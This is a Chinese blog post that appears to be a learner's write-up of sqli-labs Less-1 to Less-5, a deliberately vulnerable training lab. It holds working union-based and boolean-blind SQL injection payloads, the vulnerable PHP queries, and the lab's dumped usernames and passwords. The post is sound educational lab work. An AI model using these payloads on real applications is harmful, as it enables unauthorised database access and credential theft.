<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"10vexh.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="sql-lab刷题记录​        sqllab是atao师傅推荐我用来学sql的，网上已经有很多现成的writeup，写的知识点也比我完善，我只是用来简单记录一下自己的学习的过程。搭建的方法也很简单，网上都有，记得php版本要在7.0以前，避免要更改sql的函数。 前言为了方便后面做题，我先找到目标的数据库，然后在命令行中进行调试方便找到目标。 先是默认的账号密码进入 mysql -uroo">
<meta property="og:type" content="article">
<meta property="og:title" content="sql-lab刷题记录">
<meta property="og:url" content="http://10vexh.top/2022/01/02/sql-lab%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/index.html">
<meta property="og:site_name" content="good good study,day day up.">
<meta property="og:description" content="sql-lab刷题记录​        sqllab是atao师傅推荐我用来学sql的，网上已经有很多现成的writeup，写的知识点也比我完善，我只是用来简单记录一下自己的学习的过程。搭建的方法也很简单，网上都有，记得php版本要在7.0以前，避免要更改sql的函数。 前言为了方便后面做题，我先找到目标的数据库，然后在命令行中进行调试方便找到目标。 先是默认的账号密码进入 mysql -uroo">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-01-02T13:15:03.000Z">
<meta property="article:modified_time" content="2022-01-13T16:51:33.811Z">
<meta property="article:author" content="10vexh">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://10vexh.top/2022/01/02/sql-lab%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sql-lab刷题记录 | good good study,day day up.</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">good good study,day day up.</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://10vexh.top/2022/01/02/sql-lab%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="10vexh">
      <meta itemprop="description" content="水至清则无鱼">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="good good study,day day up.">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql-lab刷题记录
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-01-02 21:15:03" itemprop="dateCreated datePublished" datetime="2022-01-02T21:15:03+08:00">2022-01-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-01-14 00:51:33" itemprop="dateModified" datetime="2022-01-14T00:51:33+08:00">2022-01-14</time>
              </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="sql-lab刷题记录"><a href="#sql-lab刷题记录" class="headerlink" title="sql-lab刷题记录"></a>sql-lab刷题记录</h1><p>​        sqllab是atao师傅推荐我用来学sql的，网上已经有很多现成的writeup，写的知识点也比我完善，我只是用来简单记录一下自己的学习的过程。搭建的方法也很简单，网上都有，记得php版本要在7.0以前，避免要更改sql的函数。</p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>为了方便后面做题，我先找到目标的数据库，然后在命令行中进行调试方便找到目标。</p>
<p>先是默认的账号密码进入</p>
<p>mysql -uroot -p123456</p>
<p>用<code>show databases;</code></p>
<p>找到默认的数据库security,</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; show databases ;</span><br><span class="line">+--------------------+</span><br><span class="line">| Database           |</span><br><span class="line">+--------------------+</span><br><span class="line">| information_schema |</span><br><span class="line">| challenges         |</span><br><span class="line">| dvwa               |</span><br><span class="line">| mysql              |</span><br><span class="line">| performance_schema |</span><br><span class="line">| pikachu            |</span><br><span class="line">| security           |</span><br><span class="line">| sys                |</span><br><span class="line">+--------------------+</span><br></pre></td></tr></table></figure>

<p>然后<code>use security</code>，进入数据库</p>
<p><code>show tables;</code></p>
<p>找到表users</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; show tables ;</span><br><span class="line">+--------------------+</span><br><span class="line">| Tables_in_security |</span><br><span class="line">+--------------------+</span><br><span class="line">| emails             |</span><br><span class="line">| referers           |</span><br><span class="line">| uagents            |</span><br><span class="line">| users              |</span><br><span class="line">+--------------------+</span><br></pre></td></tr></table></figure>

<p>在表中进行搜索，方便做题。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from users where 1=1;</span><br><span class="line">+----+----------+------------+</span><br><span class="line">| id | username | password   |</span><br><span class="line">+----+----------+------------+</span><br><span class="line">|  1 | Dumb     | Dumb       |</span><br><span class="line">|  2 | Angelina | I-kill-you |</span><br><span class="line">|  3 | Dummy    | p@ssword   |</span><br><span class="line">|  4 | secure   | crappy     |</span><br><span class="line">|  5 | stupid   | stupidity  |</span><br><span class="line">|  6 | superman | genious    |</span><br><span class="line">|  7 | batman   | mob!le     |</span><br><span class="line">|  8 | admin    | admin      |</span><br><span class="line">|  9 | admin1   | admin1     |</span><br><span class="line">| 10 | admin2   | admin2     |</span><br><span class="line">| 11 | admin3   | admin3     |</span><br><span class="line">| 12 | dhakkan  | dumbo      |</span><br><span class="line">| 14 | admin4   | admin4     |</span><br><span class="line">+----+----------+------------+</span><br></pre></td></tr></table></figure>



<h2 id="Less-1-基于错误的GET单引号字符型注入"><a href="#Less-1-基于错误的GET单引号字符型注入" class="headerlink" title="Less-1 基于错误的GET单引号字符型注入"></a>Less-1 基于错误的GET单引号字符型注入</h2><p>首先根据题目名字，尝试输入<code>?id=-1&#39;</code></p>
<p>返回了报错的信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#x27;&#x27;-1&#x27;&#x27; LIMIT 0,1&#x27; at line 1</span><br></pre></td></tr></table></figure>

<p>然后我们进入源码中查看，发现其从中读入的数据，没有经过处理，直接读入</p>
<p><code>$sql=&quot;SELECT * FROM users WHERE id=&#39;$id&#39; LIMIT 0,1&quot;;</code></p>
<p>LIMIT表示可以返回的记录数。</p>
<p>我们尝试在数据库中利用该语句进行查询，发现是否加’都能正常返回</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from users where id=&#x27;1&#x27; limit 0,1;</span><br><span class="line">+----+----------+----------+</span><br><span class="line">| id | username | password |</span><br><span class="line">+----+----------+----------+</span><br><span class="line">|  1 | Dumb     | Dumb     |</span><br><span class="line">+----+----------+----------+</span><br><span class="line">mysql&gt; select * from users where id=1 limit 0,1;</span><br><span class="line">+----+----------+----------+</span><br><span class="line">| id | username | password |</span><br><span class="line">+----+----------+----------+</span><br><span class="line">|  1 | Dumb     | Dumb     |</span><br><span class="line">+----+----------+----------+</span><br></pre></td></tr></table></figure>

<p>而如果输入<code>?id=1&#39;</code>加了额外的<code>&#39;</code>意味着会让sql语句进行提前闭合，从而报错</p>
<p><code>select * from users where id=&#39;1&#39;&#39; limit 0,1;</code></p>
<p>而我们将后面部分利用<code>?id=1&#39;#</code>注释掉，则可以正常返回空的查询。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from users where id=&#x27;1&#x27;#&#x27; limit 0,1;</span><br><span class="line">    -&gt; ;</span><br><span class="line">+----+----------+----------+</span><br><span class="line">| id | username | password |</span><br><span class="line">+----+----------+----------+</span><br><span class="line">|  1 | Dumb     | Dumb     |</span><br><span class="line">+----+----------+----------+</span><br></pre></td></tr></table></figure>

<p>当我们输入1’# 的时候，回车还需要一个冒号作为闭合，因为系统读到#后，不会继续往下面读，默认下面的都是注释忽略了，进而达到绕过的目的。</p>
<p>因此我们可以考虑通过在1’后面加上自己想查询的东西，得到想要的答案。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from users where id=&#x27;1&#x27; order by 1,2,3#&#x27; limit 0,1;</span><br><span class="line">    -&gt; ;</span><br><span class="line">+----+----------+----------+</span><br><span class="line">| id | username | password |</span><br><span class="line">+----+----------+----------+</span><br><span class="line">|  1 | Dumb     | Dumb     |</span><br><span class="line">+----+----------+----------+</span><br><span class="line">mysql&gt; select * from users where id=&#x27;1&#x27; order by 1,2,3,4#&#x27; limit 0,1;</span><br><span class="line">    -&gt; ;</span><br><span class="line">ERROR 1054 (42S22): Unknown column &#x27;4&#x27; in &#x27;order clause&#x27;</span><br></pre></td></tr></table></figure>

<p>通过<code>?id=1&#39; order by 1,2,3--+</code>，发现其中存在三行,此时可以通过联合注入的方式进行查询。</p>
<p><code>?id=-1&#39; union select 1,2,3--+</code>发现在2，3的位置会进行回显。</p>
<p>因此我们可以开始注入了，一般的思路是获取字段数-&gt;数据库名-&gt;表名-&gt;列名-&gt;值</p>
<p>字段数就靠上面的order by进行猜解，或者通过union select直接尝试，直到遇到报错。</p>
<p>我们已知了有3列，而2，3列会回显，因此我们下一步进行查数据库名。</p>
<p>先在数据库里试一下。有几个常用的查询的默认</p>
<p>database()：当前网站使用的数据库</p>
<p>version()：当前Mysql的版本</p>
<p>user()：当前Mysql的用户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from users where id=&#x27;-1&#x27; union select version(),user(),database()#&#x27; limit 0,1;</span><br><span class="line">    -&gt; ;</span><br><span class="line">+--------+----------------+----------+</span><br><span class="line">| id     | username       | password |</span><br><span class="line">+--------+----------------+----------+</span><br><span class="line">| 5.7.26 | root@localhost | security |</span><br><span class="line">+--------+----------------+----------+</span><br></pre></td></tr></table></figure>

<p>因此我们再在网站中进行查询，<code>?id=-1&#39; union select 1,user(),database()--+</code>，进而得到数据库名和用户。</p>
<p>接着查询表。</p>
<p>同样先试一下</p>
<p>group_concat()：表示把一个分组的值串起来。</p>
<p>information_schema：mysql自带的信息数据库存在着存储数据库元数据(关于数据的数据)，例如数据库名、表名、列的数据类型、访问权限等。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from users where id=&#x27;-1&#x27; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema= &#x27;security&#x27;#&#x27; limit 0,1;</span><br><span class="line">    -&gt; ;</span><br><span class="line">+----+----------+-------------------------------+</span><br><span class="line">| id | username | password                      |</span><br><span class="line">+----+----------+-------------------------------+</span><br><span class="line">|  1 | 2        | emails,referers,uagents,users |</span><br><span class="line">+----+----------+-------------------------------+</span><br></pre></td></tr></table></figure>

<p>因此我们再在网站中进行查询，<code>?id=-1&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema= &#39;security&#39;--+</code>，得到表名。</p>
<p>再对user表进行查询。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select * from users where id=&#x27;-1&#x27; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema= &#x27;security&#x27; and table_name=&#x27;users&#x27;#&#x27; limit 0,1;</span><br><span class="line">    -&gt; ;</span><br><span class="line">+----+----------+----------------------+</span><br><span class="line">| id | username | password             |</span><br><span class="line">+----+----------+----------------------+</span><br><span class="line">|  1 | 2        | id,username,password |</span><br><span class="line">+----+----------+----------------------+</span><br></pre></td></tr></table></figure>

<p>再在网站中进行查询<code>?id=-1&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema= &#39;security&#39; and table_name=&#39;users&#39;--+</code>，得到字段名。</p>
<p>最后查用户名和密码。(格式太丑不放了)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users where id=&#x27;-1&#x27; union select 1,group_concat(username),group_concat(password) from users#&#x27; limit 0,1;</span><br></pre></td></tr></table></figure>

<p>在网站中查询<code>?id=-1&#39; union select 1,group_concat(username),group_concat(password) from users--+</code></p>
<p>会回显</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4</span><br><span class="line">Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4</span><br></pre></td></tr></table></figure>

<p>然后差不多就完了，接着下一题。</p>
<h2 id="Less-2-基于错误的get整型注入"><a href="#Less-2-基于错误的get整型注入" class="headerlink" title="Less-2 基于错误的get整型注入"></a>Less-2 基于错误的get整型注入</h2><p>这题与上一题看起来差不多，只在于一个<code>&#39;&#39;</code>的差别当我们以?<code>id=-1 or 1=1#</code>进行判断报错的时候i，发现返回了整个包裹的<code>&#39; or 1=1 LIMIT 0,1</code>所以可以判断我们多输入了一个<code>&#39;</code>,是多余的，查看代码源码也发现如此</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;SELECT * FROM users WHERE id=&#x27;$id&#x27; LIMIT 0,1&quot;;</span><br><span class="line">//第一题的</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=$id LIMIT 0,1&quot;;</span><br><span class="line">//第二题的</span><br></pre></td></tr></table></figure>

<p><code>?id=-1 union select 1,2,3#</code> 判断注入点</p>
<p><code>?id=-1 union select 1,database(),version()#</code> 取数据库名</p>
<p><code>?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#39;security&#39;#</code>  取表名</p>
<p><code>?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=&#39;security&#39; and table_name=&#39;users&#39;#</code> 取列</p>
<p><code>?id=-1 union select 1,group_concat(username),group_concat(password) from users#</code> 取内容</p>
<h2 id="Less-3-基于错误的get单引号变形字符型注入"><a href="#Less-3-基于错误的get单引号变形字符型注入" class="headerlink" title="Less-3 基于错误的get单引号变形字符型注入"></a>Less-3 基于错误的get单引号变形字符型注入</h2><p>同样用<code>?id=-1&#39; or 1=1#</code>测试，发现返回的错误为<code>&#39;) LIMIT 0,1</code>，证明这次的是用<code>)</code>进行包裹的。</p>
<p>再次查看源代码，发现确实。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;SELECT * FROM users WHERE id=&#x27;$id&#x27; LIMIT 0,1&quot;;</span><br><span class="line">//第一题的</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=$id LIMIT 0,1&quot;;</span><br><span class="line">//第二题的</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=(&#x27;$id&#x27;) LIMIT 0,1&quot;;</span><br><span class="line">//第三题的</span><br></pre></td></tr></table></figure>

<p>然后在这里我才意识到<code>?id=-1&#39; or 1=1#</code>是用不了的，而<code>?id=-1&#39; or 1=1--+</code>可以用，我本来以为<code>--+</code>一样是注释符，查了资料才发现，<code>--</code>并不是注释符，而<code>--</code>后还要加上空格，而web中<code>空格</code>和<code>+</code>等价，所以我们一般用<code>--+</code>，其他常用的注释符还有<code>/**/</code>和<code>#</code></p>
<p>所以这题我们用–+</p>
<p><code>?id=-1&#39;)  union select 1,2,3--+</code> 找注入点</p>
<p><code>?id=-1&#39;)  union select 1,database(),user()--+</code> 找数据库名</p>
<p><code>?id=-1&#39;)  union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#39;security&#39;--+</code> 取表名</p>
<p><code>?id=-1&#39;) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#39;security&#39;and table_name=&#39;users&#39;--+</code>  取列</p>
<p><code>?id=-1&#39;) union select 1,group_concat(username),group_concat(password) from users--+</code> 取内容</p>
<h2 id="Less-4-基于错误的GET双引号字符型注入"><a href="#Less-4-基于错误的GET双引号字符型注入" class="headerlink" title="Less-4 基于错误的GET双引号字符型注入"></a>Less-4 基于错误的GET双引号字符型注入</h2><p>还是先试一下<code>?id=-1&#39; or 1=1#</code>，然后发现没有任何报错的反应，然后我选择直接看了源码，发现这次的代码与之前有所不同</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;SELECT * FROM users WHERE id=&#x27;$id&#x27; LIMIT 0,1&quot;;</span><br><span class="line">//第一题的</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=(&#x27;$id&#x27;) LIMIT 0,1&quot;;</span><br><span class="line">//第三题的</span><br><span class="line">$id = &#x27;&quot;&#x27; . $id . &#x27;&quot;&#x27;;</span><br><span class="line">$sql=&quot;SELECT * FROM users WHERE id=($id) LIMIT 0,1&quot;;</span><br><span class="line">//第四题</span><br></pre></td></tr></table></figure>

<p><code>$id = &#39;&quot;&#39; . $id . &#39;&quot;&#39;;</code> 表示在php中.是用来连接的，表示把$id存储的值加上一个双引号然后在赋值给$id 这个变量，很明显我们这题要用到双引号的绕过。</p>
<p>当我们将用<code>?id=1&quot;</code>进行报错的验证，会发现返回的错误为<code>&quot;1&quot;&quot;) LIMIT 0,1</code>，从而可以判断在该处要进行双引号和括号的闭合</p>
<p><code>?id=-1&quot;) union select 1,2,3--+</code> 找注入点</p>
<p><code>?id=-1&quot;) union select 1,database(),user()--+</code> 找数据库</p>
<p><code>?id=-1&quot;) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=&#39;security&#39;--+</code> 找表名</p>
<p><code>?id=-1&quot;) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=&#39;security&#39; and table_name=&#39;users&#39;--+</code> 找列名</p>
<p><code>?id=-1&quot;) union select 1,group_concat(username),group_concat(password) from users--+</code> 取数</p>
<h2 id="Less-5-双注入GET单引号字符型注入"><a href="#Less-5-双注入GET单引号字符型注入" class="headerlink" title="Less-5 双注入GET单引号字符型注入"></a>Less-5 双注入GET单引号字符型注入</h2><p>这题思路又和前面不一样了，我不会做，看了别的师傅的思路，好像有两种方法，一种是开始了盲注。另一个就是题目本来目的双注。</p>
<p>首先先用<code>?id=1&#39;</code>，返回了报错信息<code>&#39;1&#39;&#39; LIMIT 0,1</code>，证明是单引号的，然后我们当输入的语句逻辑是正确的时候，就You are in………..会返回<code>You are in...........</code> ，我们可以根据函数，来判断数据库名字。</p>
<p><code>?id=1’ and length(database())=8--+</code> 返回正确，表示数据库名长度为8.</p>
<p>接着一个字母一个字母判断。</p>
<p><code>?id=1&#39; and ascii(substr(database(),1,1))=1--+</code>  用ascii(字母)来判断这个字母ascii值为多少。substr()表示返回字符串的一部分</p>
<p>直接抓包进行判断，错误的返回length为964，正确的为948</p>
<p>发现在<code>?id=1&#39; and ascii(substr(database(),1,1))=115--+</code> 返回正确，可以判断第一个字母的ASCII码为<code>115</code>，对应<code>s</code>，每次更改一位，然后爆破出数据库为security。</p>
<p><code>?id=1&#39; and (select count(*) from information_schema.tables where table_schema=database())=4--+</code> 判断出有四个表。</p>
<p>在数据库中可以用<code>length(table_name)</code>，找出表长，再用limit切片判断长度</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select length(table_name) from information_schema.tables where table_schema=database() limit 0,1;</span><br><span class="line">+--------------------+</span><br><span class="line">| length(table_name) |</span><br><span class="line">+--------------------+</span><br><span class="line">|                  6 |</span><br><span class="line">+--------------------+</span><br></pre></td></tr></table></figure>

<p><code>?id=1&#39; and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=6--+</code> 正常回显，则可以判断第一个表的长度。</p>
<p>同样进行爆破，然后发现第一个表的第一个字母为ascii等于101的</p>
<p><code>?id=1&#39; and (select ascii(substr(table_name,x,1)) from information_schema.tables where table_schema=database() limit y,1)=101--+</code></p>
<p>(x表示爆破的第几个字母的ascii，y表示爆破的第几个表)</p>
<p>然后，同理可以爆出存在的四个表为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">+-------------------------+</span><br><span class="line">| emails                  |</span><br><span class="line">| referers                |</span><br><span class="line">| uagents                 |</span><br><span class="line">| users                   |</span><br><span class="line">+-------------------------+</span><br></pre></td></tr></table></figure>

<p><code>?id=1&#39; and (select count(column_name) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39;)=3--+</code>  判断出在这个表中有三个列</p>
<p><code>?id=1&#39; and (select length(column_name) from information_schema.columns where table_schema=database() and table_name=&#39;users&#39; limit 0,1)=2--+</code>  判断出第一个列的长度为2，以此类推找出三个列长度。</p>
<p><code>?id=1&#39; and (select ascii(substr(column_name,1,1)) from information_schema.columns where table_schema=&#39;security&#39; and table_name=&#39;users&#39; limit 1,1)=117--+</code> 判断第二个列名字第一位为117。同样方法爆破。</p>
<p>然后判断出来存在的三个列为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">+--------------------------+</span><br><span class="line">| id                       |</span><br><span class="line">| username                 |</span><br><span class="line">| password                 |</span><br><span class="line">+--------------------------+</span><br></pre></td></tr></table></figure>

<p>然后判断第一个username。</p>
<p><code>?id=1&#39; and (select ascii(substr(username,1,1)) from users limit 0,1)=68--+</code> 判断出第一位字母为D，以此类推。最后找出表的password和username</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">+----+----------+------------+</span><br><span class="line">| id | username | password   |</span><br><span class="line">+----+----------+------------+</span><br><span class="line">|  1 | Dumb     | Dumb       |</span><br><span class="line">|  2 | Angelina | I-kill-you |</span><br><span class="line">|  3 | Dummy    | p@ssword   |</span><br><span class="line">|  4 | secure   | crappy     |</span><br><span class="line">|  5 | stupid   | stupidity  |</span><br><span class="line">|  6 | superman | genious    |</span><br><span class="line">|  7 | batman   | mob!le     |</span><br><span class="line">|  8 | admin    | admin      |</span><br><span class="line">|  9 | admin1   | admin1     |</span><br><span class="line">| 10 | admin2   | admin2     |</span><br><span class="line">| 11 | admin3   | admin3     |</span><br><span class="line">| 12 | dhakkan  | dumbo      |</span><br><span class="line">| 14 | admin4   | admin4     |</span><br><span class="line">+----+----------+------------+</span><br></pre></td></tr></table></figure>

<p>这题还存在着另外一个解法，也是题目本来想要的解法。使用双注。</p>
